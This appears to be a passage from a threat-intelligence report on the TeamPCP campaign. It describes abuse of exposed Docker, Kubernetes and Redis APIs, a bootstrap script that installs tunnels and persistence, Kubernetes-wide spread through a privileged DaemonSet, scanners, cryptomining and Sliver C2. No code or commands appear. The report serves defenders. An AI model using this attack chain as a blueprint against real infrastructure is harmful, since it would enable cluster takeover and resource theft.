TeamPCP’s operations center on abusing unauthenticated or weakly protected orchestration and management interfaces rather than exploiting traditional endpoints. Initial access is achieved via exposed Docker and Kubernetes APIs, vulnerable React/Next.js applications (CVE-2025-29927), and Redis services. Once access is obtained, attackers deploy standardized containers or jobs that fetch and execute a central bootstrap script (proxy.sh), giving them immediate execution, persistence, and outbound connectivity.
The proxy.sh script functions as the operational backbone of the campaign. It installs tunneling and proxy tools (FRPS, gost), deploys multiple scanners, and registers persistent system services. The script performs environment fingerprinting and, when a Kubernetes cluster is detected, downloads and executes a dedicated payload (kube.py) that enumerates cluster resources, propagates to all pods via API-based command execution, and deploys a privileged DaemonSet that mounts the host filesystem—effectively converting the entire cluster into a persistent botnet node.
Secondary tooling includes high-volume scanners (pcpcat.py, scanner.py) used to discover additional exposed infrastructure, automated React2Shell exploitation (react.py) for data theft and secondary payload deployment, and cryptomining components that deploy XMRig using obfuscated, multi-stage payloads. Post-exploitation activity also includes the use of the Sliver C2 framework, indicating interactive command-and-control and long-term operator-managed access.